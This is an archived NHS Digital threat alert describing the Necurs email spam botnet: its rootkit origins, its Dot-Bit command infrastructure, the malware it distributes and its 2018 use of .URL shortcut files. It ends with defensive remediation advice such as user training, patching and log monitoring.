Skip to main content

Necurs Botnet

Necurs is an email spam botnet responsible for delivering numerous other popular malware including Locky, Dridex, Zeus, TeslaCrypt, TrickBot and Magnitude.

Threat ID:
CC-1894
Category:
Botnet
Threat Severity:
Medium
Threat Vector:
Published:
8 January 2018 12:00 AM
Report a cyber attack: call 0300 303 5222 or email [email protected]

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk

Summary

Necurs is an email spam botnet responsible for delivering numerous other popular malware including Locky, Dridex, Zeus, TeslaCrypt, TrickBot and Magnitude.

Affected platforms

The following platforms are known to be affected:

Microsoft Windows

  • Microsoft Windows - All versions

Threat details

It has also been used in malvertising campaigns, distributed denial-of-service (DDoS) attacks and stock manipulation. It's modular nature makes it very resilient, with easily obtained modules giving it new capabilities, and it's owners are highly motivated in seeking out new partnerships with other malware creators.

Necurs was first observed in 2012 in Eastern Europe as a rootkit used to install other malware from a Dot-Bit domain. This bit top-level domain (TLD) exists outside the standard domain name service (DNS), meaning it cannot be seized by any authority and control remains solely with the domain owner. Access to the domain is limited to a specific hard-coded proxy setting. This distinct command and control (C2) infrastructure was unique to Necurs at the time and, coupled with its kernel-mode rootkit capabilities, makes it extremely difficult to remove Necurs from a system. Botnet capabilities were added later that same year.

Once a system is compromised and enrolled in the botnet it is used to distribute other malware in spam campaigns. These campaigns use only a portion of the entire botnet, typically using up to a million bots out of a total of 5 million. Necurs owners' added a DDoS module in 2016, at which point they began offering this capability to buyers.

Threat updates

Date Update
30 Apr 2018 Threat updates

Necurs is now using .URL files in an update to its traditional infection chain. .URLs (also known as internet shortcuts) contain INI format content, which can be used to alter the appearance of icons. Necurs is using this to change file icons so that users may be tricked int thinking the file is less suspicious. Once clicked the .URL accesses a remote resource to download a secondary dropper which in turn delivers the final payload. Necurs payload has also changed to the QuantLoader trojan.

Remediation advice

To avoid botnet infection please ensure:

Remediation steps

Type Step
  • A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
  • All operating systems, antivirus and other security products are kept up to date.
  • All day to day computer activities such as email and internet are performed using non-administrative accounts.
  • Strong password policies are in place and password reuse is discouraged.
  • Network, proxy and firewall logs should be monitored for suspicious activity.
  • User accounts accessed from infected machines should be reset on a clean computer.

Last edited: 11 January 2022 11:47 am